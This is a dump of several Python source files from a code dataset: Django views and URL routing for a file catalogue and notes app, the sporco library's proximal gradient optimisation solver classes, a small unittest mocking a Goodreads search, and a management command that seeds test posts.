all_files_info = _get_all_files_from_db()\n all_files_path_name = [(p.entry_path, p.entry_name)\n for p in all_files_info]\n for file_path, file_basename in all_files_path_name:\n if query in file_path.lower():\n matched_files_links.append(\n (file_path, file_basename))\n SEARCH_DOWNLOAD_GROUP.append(file_path)\n if len(matched_files_links) != 0:\n data = {\n 'search_results': matched_files_links,\n 'original_query': query\n }\n else:\n data = {\n 'no_results': ['Ops, no search results. Click me to go back to catalogue']}\n else:\n data = _list_directory(request)\n return data\n\n\ndef search(request):\n srh = request.GET['query'].lower()\n data = _search_files(request, srh)\n return render(request, 'catalogue/catalogue_view.html', data)\n\n\ndef search_view(request, link, query, mode=\"text\"):\n data = _search_files(request, query)\n if link:\n content = _get_xml_content(link)\n data['file_content'] = content\n data['file_path'] = link\n data['mode'] = mode\n return render(request, 'catalogue/catalogue_view.html', data)\n\n\ndef generate_sg(file_path, name):\n tree = _get_xml_tree(file_path)\n out_path = settings.TEMP_DIR\n make_graphs(tree, file_path, out_path)\n try:\n prefix = os.path.relpath(os.path.join(out_path, name[:-4]), settings.AWS_URL) + '/'\n graphs = [settings.AWS_URL + g.key for g in bucket.objects.filter(Prefix=prefix)]\n # graphs = os.listdir(os.path.join(out_path, name[:-4]+\"/\"))\n except:\n graphs = []\n return graphs\n\n\ndef _handle_uploaded_file(f, name):\n try:\n upload_path = os.path.join(settings.TEMP_DIR, name)\n bucket.upload_fileobj(f, os.path.relpath(upload_path, settings.AWS_URL))\n except:\n TypeError(os.path.relpath(settings.TEMP_DIR+name, settings.AWS_URL))\n \"\"\"\n with open(os.path.join(settings.TEMP_DIR, name), 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n \"\"\"\n\n\ndef submit_sg_generation(request):\n global SG_FILE\n message = 'Please select the file for Semantic Graph generating.'\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n SG_FILE = request.FILES['docfile']\n _handle_uploaded_file(SG_FILE, SG_FILE.name)\n redirect('generate_sg')\n else:\n message = 'The file format is not valid. Please validate your xml file.'\n else:\n form = DocumentForm()\n if SG_FILE:\n file_path = os.path.join(settings.TEMP_DIR, SG_FILE.name)\n try:\n graphs = generate_sg(file_path, SG_FILE.name)\n except Exception:\n graphs = None\n message = 'The file format is not valid. Please validate your xml file.'\n else:\n file_path = None\n graphs = None\n content = {'graphs': graphs, 'form': form, 'message': message, 'file_path': file_path}\n return render(request, 'catalogue/catalogue_sg.html', content)\n\n\ndef upload_file(request):\n message = 'Please upload a single file or a zipped file.'\n # Handle file upload\n if request.user.is_authenticated:\n username = request.user.username\n user_email = request.user.email\n else:\n username = None\n user_email = None\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n newdoc = SubmittedCatelogueEntries(docfile=request.FILES['docfile'])\n newdoc.set_uploader(username, user_email)\n newdoc.save()\n\n # Redirect to the document list after POST\n return redirect('submit')\n else:\n message = 'The form is not valid. Fix the following error:'\n else:\n form = DocumentForm() # An empty, unbound form\n\n # Load documents for the list page\n documents = [doc for doc in SubmittedCatelogueEntries.objects.all() if doc.username == username]\n\n # Render list page with the documents and the form\n context = {'documents': documents, 'form': form, 'message': message}\n return render(request, 'catalogue/upload_annotation.html', context)\n\n\n","repo_name":"RealNicolasBourbaki/SRLpp-heroku","sub_path":"catalogue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18068268779","text":"from __future__ import division, print_function\nfrom builtins import range\n\nimport copy\nimport numpy as np\n\nfrom sporco.cdict import ConstrainedDict\nfrom sporco.common import IterativeSolver, solve_status_str\nfrom sporco.fft import rfftn, irfftn\nfrom sporco.array import transpose_ntpl_list\nfrom sporco.util import Timer\n\nfrom .backtrack import BacktrackRobust\nfrom .momentum import MomentumNesterov\nfrom .stepsize import StepSizePolicyBB\n\n__author__ = \"\"\"Cristina Garcia-Cardona \"\"\"\n\n\n__all__ = ['PGM', 'PGMDFT']\n\n\n\nclass PGM(IterativeSolver):\n r\"\"\"Base class for Proximal Gradient Method (PGM) algorithms\n (see for example Ch. 10 of :cite:`beck-2017-first` and\n Sec. 4.2 and 4.3 of :cite:`parikh-2014-proximal`). Algorithms\n such as FISTA :cite:`beck-2009-fast` and a robust variant of\n FISTA :cite:`florea-2017-robust` are also supported.\n\n Solve optimisation problems of the form\n\n .. math::\n \\mathrm{argmin}_{\\mathbf{x}} \\; f(\\mathbf{x}) + g(\\mathbf{x}) \\;\\;,\n\n where :math:`f, g` are convex functions and :math:`f` is smooth.\n\n This class is intended to be a base class of other classes that\n specialise to specific optimisation problems.\n\n After termination of the :meth:`solve` method, attribute\n :attr:`itstat` is a list of tuples representing statistics of each\n iteration. The default fields of the named tuple\n ``IterationStats`` are:\n\n ``Iter`` : Iteration number\n\n ``ObjFun`` : Objective function value\n\n ``FVal`` : Value of smooth objective function component :math:`f`\n\n ``GVal`` : Value of objective function component :math:`g`\n\n ``F_Btrack`` : Value of objective function :math:`f + g`\n (see Sec. 2.2 of :cite:`beck-2009-fast`) when backtracking\n\n ``Q_Btrack`` : Value of Quadratic approximation :math:`Q_L`\n (see Sec. 2.3 of :cite:`beck-2009-fast`) when backtracking\n\n ``IterBtrack`` : Number of iterations in backtracking\n\n ``Rsdl`` : Residual\n\n ``L`` : Inverse of gradient step parameter\n\n ``Time`` : Cumulative run time\n \"\"\"\n\n class Options(ConstrainedDict):\n r\"\"\"PGM algorithm options.\n\n Options:\n\n ``FastSolve`` : Flag determining whether non-essential\n computation is skipped. When ``FastSolve`` is ``True`` and\n ``Verbose`` is ``False``, the functional value and related\n iteration statistics are not computed. If ``FastSolve`` is\n ``True`` residuals are also not calculated, in which case the\n residual-based stopping method is also disabled, with the\n number of iterations determined only by ``MaxMainIter``.\n\n ``Verbose`` : Flag determining whether iteration status is\n displayed.\n\n ``StatusHeader`` : Flag determining whether status header and\n separator are displayed.\n\n ``DataType`` : Specify data type for solution variables,\n e.g. ``np.float32``.\n\n ``X0`` : Initial value for X variable.\n\n ``Callback`` : Callback function to be called at the end of\n every iteration.\n\n ``MaxMainIter`` : Maximum main iterations.\n\n ``IterTimer`` : Label of the timer to use for iteration times.\n\n ``RelStopTol`` : Relative convergence tolerance for fixed point\n residual (see Sec. 4.3 of :cite:`liu-2018-first`).\n\n ``L`` : Inverse of gradient step parameter :math:`L`.\n\n ``AutoStop`` : Options for adaptive stopping strategy (fixed\n point residual, see Sec. 4.3 of :cite:`liu-2018-first`).\n\n ``Enabled`` : Flag determining whether the adaptive stopping\n relative parameter strategy is enabled.\n\n ``Tau0`` : numerator in adaptive criterion\n (:math:`\\tau_0` in :cite:`liu-2018-first`).\n\n ``Monotone`` : Flag determining whether a monotone PGM version\n from :cite:`beck-2009-tv` is used. Default is False.\n\n ``Momentum`` : Momentum coefficient adaptation object. Standard\n options are Nesterov :cite:`beck-2009-fast`\n (:class:`.MomentumNesterov`), Linear\n :cite:`chambolle-2015-convergence`\n (:class:`.MomentumLinear`), and GenLinear\n :cite:`rodriguez-2019-convergence`\n (:class:`.MomentumGenLinear`), but a custom class derived\n from :class:`.MomentumBase` may also be specified. Default\n is :class:`.MomentumNesterov`.\n\n ``StepSizePolicy`` : non-iterative L adaptation object.\n Standard options are Cauchy :cite:`yuan-2008-stepsize`\n Sec. 3 (:class:`.StepSizePolicyCauchy`), and Barzilai-Borwein\n :cite:`barzilai-1988-stepsize`\n (:class:`.StepSizePolicyBB`), but a custom class derived\n from :class:`.StepSizePolicyBase` may also be specified.\n Default is None, no non-iterative L adaptation. Note that in\n case that both step size and Backtrack strategies are enabled\n only Backtrack will be used.\n\n ``Backtrack`` : PGM backtracking options. Options are Standard\n :cite:`beck-2009-fast` (:class:`.BacktrackStandard`) and\n Robust :cite:`florea-2017-robust` (:class:`.BacktrackRobust`),\n but a custom class derived from :class:`.BacktrackBase` may\n also be specified. Default is None, no backtracking. Note that\n in case that both step size and Backtrack strategies\n are enabled only Backtrack will be used.\n\n \"\"\"\n\n defaults = {'FastSolve': False, 'Verbose': False,\n 'StatusHeader': True, 'DataType': None,\n 'X0': None, 'Callback': None,\n 'MaxMainIter': 1000, 'IterTimer': 'solve',\n 'RelStopTol': 1e-3, 'L': None,\n 'AutoStop': {'Enabled': False, 'Tau0': 1e-2},\n 'Monotone': False,\n 'Momentum': MomentumNesterov(),\n 'StepSizePolicy': None,\n 'Backtrack': None}\n\n def __init__(self, opt=None):\n \"\"\"\n Parameters\n ----------\n opt : dict or None, optional (default None)\n PGM algorithm options\n \"\"\"\n\n if opt is None:\n opt = {}\n ConstrainedDict.__init__(self, opt)\n\n\n\n fwiter = 4\n \"\"\"Field width for iteration count display column\"\"\"\n fpothr = 2\n \"\"\"Field precision for other display columns\"\"\"\n\n itstat_fields_objfn = ('ObjFun', 'FVal', 'GVal')\n \"\"\"Fields in IterationStats associated with the objective function;\n see :meth:`eval_objfun`\"\"\"\n itstat_fields_alg = ('Rsdl', 'F_Btrack', 'Q_Btrack', 'IterBTrack', 'L')\n \"\"\"Fields in IterationStats associated with the specific solver\n algorithm\"\"\"\n itstat_fields_extra = ()\n \"\"\"Non-standard fields in IterationStats; see :meth:`itstat_extra`\"\"\"\n\n hdrtxt_objfn = ('Fnc', 'f', 'g')\n \"\"\"Display column headers associated with the objective function;\n see :meth:`eval_objfun`\"\"\"\n hdrval_objfun = {'Fnc': 'ObjFun', 'f': 'FVal', 'g': 'GVal'}\n \"\"\"Dictionary mapping display column headers in :attr:`hdrtxt_objfn`\n to IterationStats entries\"\"\"\n\n\n\n def __new__(cls, *args, **kwargs):\n \"\"\"Create a PGM object and start its initialisation timer.\"\"\"\n\n instance = super(PGM, cls).__new__(cls)\n instance.timer = Timer(['init', 'solve', 'solve_wo_func',\n 'solve_wo_rsdl', 'solve_wo_btrack'])\n instance.timer.start('init')\n return instance\n\n\n\n def __init__(self, xshape, dtype, opt=None):\n r\"\"\"\n Parameters\n ----------\n xshape : tuple of ints\n Shape of working variable X\n dtype : data-type\n Data type for working variables (overridden by 'DataType' option)\n opt : :class:`PGM.Options` object\n Algorithm options\n \"\"\"\n\n if opt is None:\n opt = PGM.Options()\n if not isinstance(opt, PGM.Options):\n raise TypeError(\"Parameter opt must be an instance of \"\n \"PGM.Options\")\n\n self.opt = opt\n\n # DataType option overrides data type inferred from __init__\n # parameters of derived class\n self.set_dtype(opt, dtype)\n\n # Initialise attributes representing step parameter and other\n # parameters\n self.set_attr('L', opt['L'], dval=1.0, dtype=self.dtype)\n\n # Configure policy for step size\n # Step size policy is turned off if Backtrack is enabled\n self.stepsizepolicy = self.opt['StepSizePolicy']\n if self.opt['Backtrack'] is not None:\n self.stepsizepolicy = None\n\n # Configure Momentum coefficients\n self.momentum = self.opt['Momentum']\n\n # If using adaptative stop criterion, set tau0 parameter\n if self.opt['AutoStop', 'Enabled']:\n self.tau0 = self.opt['AutoStop', 'Tau0']\n\n # Initialise working variable X\n if self.opt['X0'] is None:\n self.X = self.xinit(xshape)\n else:\n self.X = self.opt['X0'].astype(self.dtype, copy=True)\n\n # Default values for variables created only if Backtrack is enabled\n self.F = None\n self.Q = None\n self.iterBTrack = None\n self.backtrack = self.opt['Backtrack']\n\n self.Y = None\n\n self.itstat = []\n self.k = 0\n self.t = 1\n\n\n\n def xinit(self, xshape):\n \"\"\"Return initialiser for working variable X.\"\"\"\n\n return np.zeros(xshape, dtype=self.dtype)\n\n\n\n def solve(self):\n \"\"\"Start (or re-start) optimisation. This method implements the\n framework for the iterations of a PGM algorithm. There is\n sufficient flexibility in overriding the component methods that\n it calls that it is usually not necessary to override this method\n in derived clases.\n\n If option ``Verbose`` is ``True``, the progress of the\n optimisation is displayed at every iteration. At termination\n of this method, attribute :attr:`itstat` is a list of tuples\n representing statistics of each iteration, unless option\n ``FastSolve`` is ``True`` and option ``Verbose`` is ``False``.\n\n Attribute :attr:`timer` is an instance of :class:`.util.Timer`\n that provides the following labelled timers:\n\n ``init``: Time taken for object initialisation by\n :meth:`__init__`\n\n ``solve``: Total time taken by call(s) to :meth:`solve`\n\n ``solve_wo_func``: Total time taken by call(s) to\n :meth:`solve`, excluding time taken to compute functional\n value and related iteration statistics\n\n ``solve_wo_rsdl`` : Total time taken by call(s) to\n :meth:`solve`, excluding time taken to compute functional\n value and related iteration statistics as well as time take\n to compute residuals\n\n ``solve_wo_btrack`` : Total time taken by call(s) to\n :meth:`solve`, excluding time taken to compute functional\n value and related iteration statistics as well as time take\n to compute residuals and implemented ``Backtrack`` mechanism\n \"\"\"\n\n # Open status display\n fmtstr, nsep = self.display_start()\n\n # Start solve timer\n self.timer.start(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Main optimisation iterations\n for self.k in range(self.k, self.k + self.opt['MaxMainIter']):\n\n # Update record of X and Y from previous iteration\n self.on_iteration_start()\n\n # Compute backtracking\n if self.opt['Backtrack'] is not None and self.k >= 0:\n self.timer.stop('solve_wo_btrack')\n # Compute backtracking\n self.backtrack.update(self)\n self.timer.start('solve_wo_btrack')\n else:\n # Compute just proximal step\n self.xstep()\n # Update by combining previous iterates\n self.ystep()\n\n # Compute residuals and stopping thresholds\n self.timer.stop(['solve_wo_rsdl', 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n frcxd, adapt_tol = self.compute_residuals()\n self.timer.start('solve_wo_rsdl')\n\n # Compute and record other iteration statistics and\n # display iteration stats if Verbose option enabled\n self.timer.stop(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n itst = self.iteration_stats(self.k, frcxd)\n self.itstat.append(itst)\n self.display_status(fmtstr, itst)\n self.timer.start(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Call callback function if defined\n if self.opt['Callback'] is not None:\n if self.opt['Callback'](self):\n break\n\n # Stop if residual-based stopping tolerances reached\n if not self.opt['FastSolve']:\n if frcxd < adapt_tol:\n break\n\n # Increment iteration count\n self.k += 1\n\n # Record solve time\n self.timer.stop(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Print final separator string if Verbose option enabled\n self.display_end(nsep)\n\n return self.getmin()\n\n\n\n def getmin(self):\n \"\"\"Get minimiser after optimisation.\"\"\"\n\n return self.X\n\n\n\n def xstep(self, grad=None):\n \"\"\"Compute proximal update (gradient descent + regularization).\n Optionally, a monotone PGM version from :cite:`beck-2009-tv`\n is available.\n \"\"\"\n\n if grad is None:\n grad = self.grad_f()\n\n if self.stepsizepolicy is not None:\n if self.k > 1:\n self.L = self.stepsizepolicy.update(self, grad)\n if isinstance(self.stepsizepolicy, StepSizePolicyBB):\n # BB variants are two-point methods\n self.stepsizepolicy.store_prev_state(self.X, grad)\n\n V = self.Y - (1. / self.L) * grad\n\n self.X = self.prox_g(V)\n\n if self.opt['Monotone'] and self.k > 0:\n self.ZZ = self.X.copy()\n self.objfn = self.eval_objfn()\n if self.objfn_prev[0] < self.objfn[0]:\n # If increment on objective function\n # revert to previous iterate\n self.X = self.Xprv.copy()\n self.objfn = self.objfn_prev\n\n return grad\n\n\n\n def ystep(self):\n \"\"\"Build next update by a smart combination of previous updates\n (standard PGM :cite:`beck-2009-fast`). Optionally, a monotone\n PGM version from :cite:`beck-2009-tv` is available.\n \"\"\"\n\n # Update t step\n tprv = self.t\n self.t = self.momentum.update(self.var_momentum())\n\n # Update Y\n if self.opt['Monotone'] and self.k > 0:\n self.Y = self.X + (tprv / self.t) * (self.ZZ - self.X) \\\n + ((tprv - 1.) / self.t) * (self.X - self.Xprv)\n else:\n self.Y = self.X + ((tprv - 1.) / self.t) * (self.X - self.Xprv)\n\n\n\n def eval_linear_approx(self, Dxy, gradY):\n r\"\"\"Compute term :math:`\\langle \\nabla f(\\mathbf{y}), \\mathbf{x}\n - \\mathbf{y} \\rangle` that is part of the quadratic function\n :math:`Q_L` used for backtracking.\n \"\"\"\n\n return np.sum(Dxy * gradY)\n\n\n\n def grad_f(self, V):\n \"\"\"Compute gradient of :math:`f` at V.\n\n Overriding this method is required.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def prox_g(self, V):\n \"\"\"Compute proximal operator of :math:`g`.\n\n Overriding this method is required.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def hessian_f(self, V):\n \"\"\"Compute Hessian of :math:`f` and apply to V.\n\n Overriding this method is required.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def on_iteration_start(self):\n \"\"\"Store previous X and Y states.\"\"\"\n\n self.Xprv = self.X.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yprv = self.Y.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn\n\n\n def eval_Dxy(self):\n \"\"\"Evaluate difference of state and auxiliary state updates.\"\"\"\n\n return self.X - self.Y\n\n\n\n def compute_residuals(self):\n \"\"\"Compute residuals and stopping thresholds.\"\"\"\n\n r = self.rsdl()\n adapt_tol = self.opt['RelStopTol']\n\n if self.opt['AutoStop', 'Enabled']:\n adapt_tol = self.tau0 / (1. + self.k)\n\n return r, adapt_tol\n\n\n\n @classmethod\n def hdrtxt(cls):\n \"\"\"Construct tuple of status display column title.\"\"\"\n\n return ('Itn',) + cls.hdrtxt_objfn + ('Rsdl', 'F', 'Q', 'It_Bt', 'L')\n\n\n\n @classmethod\n def hdrval(cls):\n \"\"\"Construct dictionary mapping display column title to\n IterationStats entries.\n \"\"\"\n\n hdr = {'Itn': 'Iter'}\n hdr.update(cls.hdrval_objfun)\n hdr.update({'Rsdl': 'Rsdl', 'F': 'F_Btrack', 'Q': 'Q_Btrack',\n 'It_Bt': 'IterBTrack', 'L': 'L'})\n\n return hdr\n\n\n\n def iteration_stats(self, k, frcxd):\n \"\"\"Construct iteration stats record tuple.\"\"\"\n\n tk = self.timer.elapsed(self.opt['IterTimer'])\n if self.opt['Monotone']:\n tpl = (k,) + self.objfn \\\n + (frcxd, self.F, self.Q, self.iterBTrack, self.L) \\\n + self.itstat_extra() + (tk,)\n else:\n tpl = (k,) + self.eval_objfn() \\\n + (frcxd, self.F, self.Q, self.iterBTrack, self.L) \\\n + self.itstat_extra() + (tk,)\n return type(self).IterationStats(*tpl)\n\n\n\n def eval_objfn(self):\n \"\"\"Compute components of objective function as well as total\n contribution to objective function.\n \"\"\"\n\n fval = self.obfn_f(self.X)\n gval = self.obfn_g(self.X)\n obj = fval + gval\n return (obj, fval, gval)\n\n\n\n def itstat_extra(self):\n \"\"\"Non-standard entries for the iteration stats record tuple.\"\"\"\n\n return ()\n\n\n\n def getitstat(self):\n \"\"\"Get iteration stats as named tuple of arrays instead of\n array of named tuples.\n \"\"\"\n\n return transpose_ntpl_list(self.itstat)\n\n\n\n def display_start(self):\n \"\"\"Set up status display if option selected. NB: this method\n assumes that the first entry is the iteration count and the\n last is the L value.\n \"\"\"\n\n if self.opt['Verbose']:\n # If backtracking option enabled F, Q, itBT, L are\n # included in iteration status\n if self.opt['Backtrack'] is not None:\n hdrtxt = type(self).hdrtxt()\n else:\n hdrtxt = type(self).hdrtxt()[0:-4]\n # Call utility function to construct status display formatting\n hdrstr, fmtstr, nsep = solve_status_str(\n hdrtxt, fmtmap={'It_Bt': '%5d'}, fwdth0=type(self).fwiter,\n fprec=type(self).fpothr)\n # Print header and separator strings\n if self.opt['StatusHeader']:\n print(hdrstr)\n print(\"-\" * nsep)\n else:\n fmtstr, nsep = '', 0\n\n return fmtstr, nsep\n\n\n\n def display_status(self, fmtstr, itst):\n \"\"\"Display current iteration status as selection of fields from\n iteration stats tuple.\n \"\"\"\n\n if self.opt['Verbose']:\n hdrtxt = type(self).hdrtxt()\n hdrval = type(self).hdrval()\n itdsp = tuple([getattr(itst, hdrval[col]) for col in hdrtxt])\n if self.opt['Backtrack'] is None:\n itdsp = itdsp[0:-4]\n\n print(fmtstr % itdsp)\n\n\n\n def display_end(self, nsep):\n \"\"\"Terminate status display if option selected.\"\"\"\n\n if self.opt['Verbose'] and self.opt['StatusHeader']:\n print(\"-\" * nsep)\n\n\n\n def var_x(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable.\"\"\"\n\n return self.X\n\n\n\n def var_y(self, y=None):\n r\"\"\"Get, or update and get, :math:`\\mathbf{y}` variable.\"\"\"\n\n if y is not None:\n self.Y = y\n\n return self.Y\n\n\n\n def var_xprv(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable of previous iteration.\"\"\"\n\n return self.Xprv\n\n\n\n def var_momentum(self):\n \"\"\"Most momentum coefficient methods require iteration but Nesterov\n requires current t.\"\"\"\n\n if isinstance(self.momentum, MomentumNesterov):\n return self.t\n return self.k\n\n\n\n def obfn_f(self, X):\n r\"\"\"Compute :math:`f(\\mathbf{x})` component of PGM objective\n function.\n\n Overriding this method is required (even if :meth:`eval_objfun`\n is overriden, since this method is required for backtracking).\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def obfn_g(self, X):\n r\"\"\"Compute :math:`g(\\mathbf{x})` component of PGM objective\n function.\n\n Overriding this method is required if :meth:`eval_objfun`\n is not overridden.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def rsdl(self):\n \"\"\"Compute fixed point residual (see Sec. 4.3 of\n :cite:`liu-2018-first`).\"\"\"\n\n if self.opt['Monotone'] and self.k > 0:\n return np.linalg.norm((self.X - self.Y).ravel())\n return np.linalg.norm((self.X - self.Yprv).ravel())\n\n\n\n\n\nclass PGMDFT(PGM):\n r\"\"\"\n Base class for PGM algorithms with gradients and updates computed\n in the frequency domain.\n\n |\n\n .. inheritance-diagram:: PGMDFT\n :parts: 2\n\n |\n\n Solve optimisation problems of the form\n\n .. math::\n \\mathrm{argmin}_{\\mathbf{x}} \\; f(\\mathbf{x}) + g(\\mathbf{x})\n \\;\\;,\n\n where :math:`f, g` are convex functions and :math:`f` is smooth.\n\n This class specialises class PGM, but remains a base class for\n other classes that specialise to specific optimisation problems.\n \"\"\"\n\n\n class Options(PGM.Options):\n \"\"\"PGMDFT algorithm options.\n\n Options include all of those defined in :class:`PGM.Options`.\n \"\"\"\n\n defaults = copy.deepcopy(PGM.Options.defaults)\n\n def __init__(self, opt=None):\n \"\"\"\n Parameters\n ----------\n opt : dict or None, optional (default None)\n PGMDFT algorithm options\n \"\"\"\n\n if opt is None:\n opt = {}\n PGM.Options.__init__(self, opt)\n\n\n\n def __init__(self, xshape, Nv, axisN, dtype, opt=None):\n \"\"\"\n Parameters\n ----------\n xshape : tuple of ints\n Shape of working variable X (the primary variable)\n Nv : tuple of ints\n Shape of spatial indices of variable X (needed for DFT)\n axisN : tuple of ints\n Axis indices of spatial components of X (needed for DFT)\n dtype : data-type\n Data type for working variables\n opt : :class:`PGMDFT.Options` object\n Algorithm options\n \"\"\"\n\n if opt is None:\n opt = PGMDFT.Options()\n super(PGMDFT, self).__init__(xshape, dtype, opt)\n self.Nv = Nv\n self.axisN = axisN\n\n\n\n def xstep(self, gradf=None):\n \"\"\"Compute proximal update (gradient descent + constraint).\n Variables are mapped back and forth between input and\n frequency domains. Optionally, a monotone PGM version from\n :cite:`beck-2009-tv` is available.\n \"\"\"\n\n if gradf is None:\n gradf = self.grad_f()\n\n if self.stepsizepolicy is not None:\n if self.k > 1:\n self.L = self.stepsizepolicy.update(self, gradf)\n if isinstance(self.stepsizepolicy, StepSizePolicyBB):\n # BB variants are two-point methods\n self.stepsizepolicy.store_prev_state(self.Xf, gradf)\n\n self.Vf[:] = self.Yf - (1. / self.L) * gradf\n V = irfftn(self.Vf, self.Nv, self.axisN)\n\n self.X[:] = self.prox_g(V)\n self.Xf = rfftn(self.X, None, self.axisN)\n\n if self.opt['Monotone'] and self.k > 0:\n self.ZZf = self.Xf.copy()\n self.objfn = self.eval_objfn()\n if self.objfn_prev[0] < self.objfn[0]:\n # If increment on objective function\n # revert to previous iterate\n self.Xf = self.Xfprv.copy()\n self.objfn = self.objfn_prev\n\n return gradf\n\n\n\n def ystep(self):\n \"\"\"Update auxiliary state by a smart combination of previous\n updates in the frequency domain (standard PGM\n :cite:`beck-2009-fast`). Optionally, a monotone PGM version\n from :cite:`beck-2009-tv` is available.\n \"\"\"\n\n # Update t step\n tprv = self.t\n self.t = self.momentum.update(self.var_momentum())\n\n # Update Y\n if self.opt['Monotone'] and self.k > 0:\n self.Yf = self.Xf + (tprv / self.t) * (self.ZZf - self.Xf) \\\n + ((tprv - 1.) / self.t) * (self.Xf - self.Xfprv)\n else:\n self.Yf = self.Xf + ((tprv - 1.) / self.t) * (self.Xf - self.Xfprv)\n\n\n\n def on_iteration_start(self):\n \"\"\"Store previous X and Y in frequency domain.\"\"\"\n\n self.Xfprv = self.Xf.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yfprv = self.Yf.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn\n\n\n\n def eval_Dxy(self):\n \"\"\"Evaluate difference of state and auxiliary state in\n frequency domain.\n \"\"\"\n\n return self.Xf - self.Yf\n\n\n\n def var_x(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable in frequency domain.\"\"\"\n\n return self.Xf\n\n\n\n def var_y(self, y=None):\n r\"\"\"Get, or update and get, :math:`\\mathbf{y}` variable in\n frequency domain.\"\"\"\n\n if y is not None:\n self.Yf = y\n\n return self.Yf\n\n\n\n def var_xprv(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable of previous iteration in\n frequency domain.\n \"\"\"\n\n return self.Xfprv\n\n\n\n def eval_linear_approx(self, Dxy, gradY):\n r\"\"\"Compute term :math:`\\langle \\nabla f(\\mathbf{y}),\n \\mathbf{x} - \\mathbf{y} \\rangle` (in frequency domain) that is\n part of the quadratic function :math:`Q_L` used for\n backtracking. Since this class computes the backtracking in\n the DFT, it is important to preserve the DFT scaling.\n \"\"\"\n\n return np.sum(np.real(np.conj(Dxy) * gradY))\n","repo_name":"bwohlberg/sporco","sub_path":"sporco/pgm/pgm.py","file_name":"pgm.py","file_ext":"py","file_size_in_byte":27148,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"54"} +{"seq_id":"416814142","text":"\"\"\"technotesplus URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\n\"\"\"\n\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.urls.conf import include\n\n\nurlpatterns = [\n path(\"\", include(\"technotesplus.apps.core.urls\")),\n path(\"account/\", include(\"technotesplus.apps.account.urls\")),\n path(\"admin/\", admin.site.urls),\n path(\"notes/\", include(\"technotesplus.apps.note.urls\")),\n # jwt\n path(\"api/v1/token/\", TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"api/v1/token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n # api endpoints\n path(\"api/v1/account/\", include(\"technotesplus.apps.account.api.urls\")),\n path(\"api/v1/n/\", include(\"technotesplus.apps.note.api.urls\")),\n]\n","repo_name":"adnan-alam/technotesplus","sub_path":"technotesplus/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2861182232","text":"import webbrowser\nimport unittest\nimport unittest.mock\nfrom unittest.mock import patch\nimport webbrowser\n\nclass TestReview(unittest.TestCase):\n @patch('webbrowser.open')\n def test_normal_input(self, mock):\n\n result = {\n \"title\": \"Way of kings\",\n \"Author\": \"Brandon Sanderson\",\n }\n\n webbrowser.open('https://www.goodreads.com/search?utf8=%E2%9C%93&q=' + result[\"title\"] +'&search_type=books')\n\n self.assertTrue(mock.called)\n\n @patch('webbrowser.open')\n def test_messy_input(self, mock):\n\n result = {\n \"title\": \"asdawdawd\",\n \"Author\": \"asfdafw\",\n }\n\n webbrowser.open('https://www.goodreads.com/search?utf8=%E2%9C%93&q=' + result[\"title\"] +'&search_type=books')\n\n self.assertTrue(mock.called)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Sabesan2000/SOFE-QUAILTY-FINAL","sub_path":"Testing/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"27821151477","text":"import random\nfrom datetime import timedelta\nfrom random import randint\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils.timezone import now\n\nfrom web.models import User, Pet, Post\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n current_date = now()\n user = User.objects.first()\n pets = Pet.objects.filter(user=user)\n\n posts = []\n\n for day_index in range(30):\n current_date -= timedelta(days=1)\n\n for post_index in range(randint(5, 10)):\n start_date = current_date + timedelta(days=randint(1, 10))\n end_date = start_date + timedelta(days=randint(1, 30))\n\n posts.append(Post(\n title=f'generated {day_index}-{post_index}',\n post_date=current_date,\n start_date=start_date,\n end_date=end_date,\n content=f'generated content {day_index}-{post_index}',\n opened=random.choice((True, False)),\n price=randint(100, 3000),\n user=user\n ))\n\n saved_posts = Post.objects.bulk_create(posts)\n post_pets = []\n for post in saved_posts:\n count_of_pets = randint(1, len(pets))\n for pet_index in range(count_of_pets):\n post_pets.append(\n Post.pets.through(post_id=post.id, pet_id=pets[pet_index].id)\n )\n 